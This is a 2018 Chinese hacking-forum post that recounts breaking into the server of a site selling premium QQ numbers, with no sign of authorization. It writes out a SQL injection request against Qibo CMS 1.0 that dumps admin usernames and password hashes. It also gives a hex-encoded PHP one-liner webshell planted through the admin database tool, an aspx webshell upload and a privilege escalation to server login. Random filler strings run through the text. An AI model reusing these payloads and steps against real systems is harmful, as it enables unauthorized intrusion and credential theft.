中国网络渗透测试联盟

标题: 入侵卖靓号QQ骗子网站服务器纪实 [打印本页]

作者: admin    时间: 2018-10-20 20:08
标题: 入侵卖靓号QQ骗子网站服务器纪实

7 N! B! w$ z) ?! j/ ~1 A: F
; T6 W# [0 O9 i A

0 o- ^" H: e) C* B4 @: z

$ ]3 K. _( B" s' s5 D 一、踩点寻找漏洞
$ {8 p6 J0 c# b( G2 r0 ?
闲来无事,在各个QQ靓号群求买5QQ,寻问半天无果就在百度搜索5QQ扫号找到目标www.qq.com,打开一看就一静态页面,哇好多靓号啊,90000000,300000,98888888199999999,哇这么多靓号,然后我去联系客服,要求客服登录账户看看,此处略去100字,然后开始撕逼,然后就有了下文。。。。
7 d1 b2 x" G5 j/ ?& x' D; D
随手拿御剑扫了一下好多php页面,随手加一个member发现是齐博1.0的内容管理系统,然后就去百度找漏洞,什么后门漏洞一一做测试都无果,找来找去找到一个全版本的注入漏洞,详细利用方法如下:
# @" f; }9 Z/ h
先注册一个用户,记住注册时候的邮箱以uid号,
1 O! Z0 B% g5 @6 Y, c+ @- z
3-1.png
; W: o; \' J1 q
3-2.png
; J) O4 ?" o2 A6 V5 y
然后我们打开火狐浏览器简单构造一下,http://www.qq.com/member/userinfo.php?job=edit&step=2,发送数据包如下:
9 J! p* T, m* c3 u$ `- C8 U7 ^. F, R4 p
1 e& A& k# q# f& H E8 e* o) v1 w/ Xtruename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select user()) where uid=3%23
3 m ~: B& t. F2 U' J
这里的emailuid一定要和注册的账号所吻合,然后访问,提示成功以后查看用户资料如图:
/ K6 k+ j, l+ e" H" }5 c* ]
3-3.png
3 X+ L9 D% V7 p, I4 o A* \4 X
确实存在注入漏洞,那么我们来注入一下管理账号密码,修改数据包如:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select concat(username,0x2e,password) from qb_members limit 1) where uid=3%23
% s" j, s# H# c6 m* E3 O d/ v
3-4.png
8 B* P- ]. B: q% C; e1 L
* W+ \! ^/ \6 M
解密进后台如图:
) f( q! j' A* u) c5 @1 h
3-5.png
* E+ p, |0 _5 ?- g3 t7 C
8 U# s$ p& H' A; R
$ x( O1 ?, o1 a5 |- l
二、后台getwebshell        
. {1 _+ l$ _8 X+ L# v, U
进了后台,以前齐博有个后台getwebshell漏洞,在系统功能- 单篇文章独立页面管理-增加页面添加个webshell,如图:
' ~5 h+ J- P& F
: s* n2 T2 A- B( ~, x% T
3-6.png
6 `3 m9 b7 p! U9 M
5 y# m% d I0 X$ u' J% t
然后点确定,添加提示
) R6 r- X% ~, S( d# ~
7 f1 l/ A& D6 A) L. m3 E
3-7.png
; C) r/ y0 G6 U5 _
, u4 f: Q8 h# ?
由于是ii6.0的所以我们可以考虑一下解析漏洞,我们再来如图:
( S0 }1 ?- m: I
5 e; C2 L9 k: |( S' v3 k
3-8.png
9 Y( E! e/ R9 z/ `9 u( Y% E% X
改静态页面为help.php;.htm,然后我们发现访问help.php;.htm404(写文章之前测试是可以成功写入的),欧巴,他么的我们再想想别的办法,抽了一支烟,我们继续,他这里不是有个服务器信息、数据库工具吗,之前我们测试当前用户名是root,那么我们完全可以考虑利用服务器信息、数据库工具来导入一句话,屌屌的妈妈的,我们来演示一下,先把一句话hex编码一下,<?php assert($_POST[sb]);?>编码以后是:0x3C3F7068702061737365727428245F504F53545B73625D293B3F3EDA网站目录是D:\wwwroot\qq.com\admin\,注意我们要把\改成/,否则不成功D:/wwwroot/qq.com/admin/,下面我们来导一下
5 a* e' v- S# I
如图:
5 R+ H& J2 i4 Z" C! W* p$ C
3-9.png
9 O" p6 k# I0 {. y, S5 d5 N. R
3-10.png
/ \2 n8 e6 F: i& g5 T! N t
% T0 F- A6 f9 u0 Q* d- Q2 d8 ?
之前已经测试过了用普通菜刀无法连接,测试用过狗菜刀也无法连接,用xiese打开
6 A" ?9 f* f3 m0 t, D7 P
& t- v# F1 k# q6 Y# _5 y7 s
3-11.png
+ C& S0 D: h* o/ ^
: a- ?$ k5 l4 j2 u( p0 p, C
三、提权进服务器
- h5 G$ O# O4 r4 P# k5 c" v0 H
经测试xise下一句话只有在admin目录下有权限浏览,且不能执行命令,庆幸的是支持aspx,那么我们就上一个aspx大马,然后执行命令提示拒绝访问,哈哈在c:\windows\temp下上传cmd.exe然后执行systeminfo,发现打了400多补丁,如图:
2 D7 o B) W' W
3-12.png
% K4 e" C; ]6 M! d8 V6 R
9 g' G- r- R+ c9 z! ]' P
啧啧啧,这么多补丁,我都没去试试今年和2014年放出来的exp,而且是在咱们大00下载了一个变异pr,然后上传提权如图:
* X" V; W9 T& ?; s: b: `
3-13.png
- h' M/ I: G. \0 s5 n4 k
) a5 j8 Q$ z6 X i% i! x/ ?
然后登陆服务器如图:
5 \7 `2 g: c6 j7 d
9 @5 u8 t/ ^8 `- T
3-14.png ; M! u+ O5 h; u$ n5 h- \( A

: X. p* o$ T3 F

+ m3 F! s; A" I% \% i2 i: q) C% [
" G" W& N" V2 u
难怪普通刀连接不上,原来是有狗。
+ ?1 x& f p+ ~; N+ h
- t; B8 _- i4 p d
0 q; {- ~! t8 @! w5 {
$ ?: R: i; z4 M! W, D# a' B

# e, @! ~8 ~# n$ v4 n

$ k2 ]& s/ k; ^& w0 G. D
- u$ q) q5 a4 O5 [- @& t






欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2